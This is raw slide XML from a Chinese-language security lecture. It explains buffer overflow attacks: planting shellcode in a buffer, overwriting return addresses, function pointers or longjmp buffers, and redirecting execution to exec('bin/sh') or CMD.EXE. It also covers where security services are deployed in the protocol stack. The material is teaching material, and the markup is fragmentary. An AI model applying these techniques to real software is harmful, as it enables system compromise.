                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293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3178"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293178"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293178"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2931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3177"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293177"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293177"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2931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3176"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293176"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293176"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2931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3175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293175"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29317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5" grpId="0" animBg="1"/>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灯片编号占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{087968B7-5F2A-4F55-B8A7-26C4B9B3F0A3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299013" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见的情形</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="299010" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="tbl" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1910085"/>
            <a:ext cx="7431573" cy="2383011"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299012" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="3933130"/>
            <a:ext cx="2051050" cy="719931"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72120"/>
              <a:gd name="adj2" fmla="val -215416"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>返回地址</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"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blinds(horizontal)">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9012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="299012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="299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9" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="2060848"/>
            <a:ext cx="7705551" cy="2274457"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647272" y="6407944"/>
            <a:ext cx="365760" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4753859A-D0C7-42A6-9AD8-4DFB179EB5CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何能够进行系统调用？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2267744" y="4509120"/>
            <a:ext cx="3096344" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49548"/>
              <a:gd name="adj2" fmla="val -188977"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>调整该地址，指向</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>调用程序，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>CMD.EXE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击代码安排（代码植入）：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在存在漏洞的某些存储结构（缓冲区）中安排适当的攻击代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>流程控制：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>改写程序执行流程，转移到攻击代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一步完成代码植入和流程控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>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缓冲区溢出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252"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37D5522D-B54D-407F-9DBF-933D3458927E}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>植入法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>将攻击代码写入某个缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用已存在的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>’bin/sh’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>查找代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Exec(arg)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，并修改参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>为‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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攻击代码安排</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276"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E5D09E17-9764-448B-AC7D-A2AAB6A338CA}"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D29FF866-FF17-4FAD-A1FB-4ACDBFCE99D9}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571403" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>稳固而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全服务的部署</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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anose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>应用层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传输层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anose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>网络层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数据链路层</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>物理层</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRP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t>端到端</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>链到链</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRP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细粒度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>安全服务多</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>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粗粒度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>安全服务少</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>激活记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出缓冲区，用攻击代码地址覆盖函数返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数指针可定位任何地址空间，并执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出在函数指针附近的缓冲区，修改函数指针的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>长跳转缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>语言中的检验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恢复系统，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>进行程序异常处理，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）进行程序跳转</a:t>
            </a:r>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控制流程转移方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300"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06A9436C-6A00-4E51-B600-33B77F805564}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在缓冲区中植入攻击代码和激活记录（修改返回地址以指向攻击代码）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>也可通过溢出两个缓冲区来完成。</a:t>
            </a:r>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综合代码植入和流程控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324"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C8937939-ECFE-4F3A-8B2D-D5DE425A3D06}"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342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
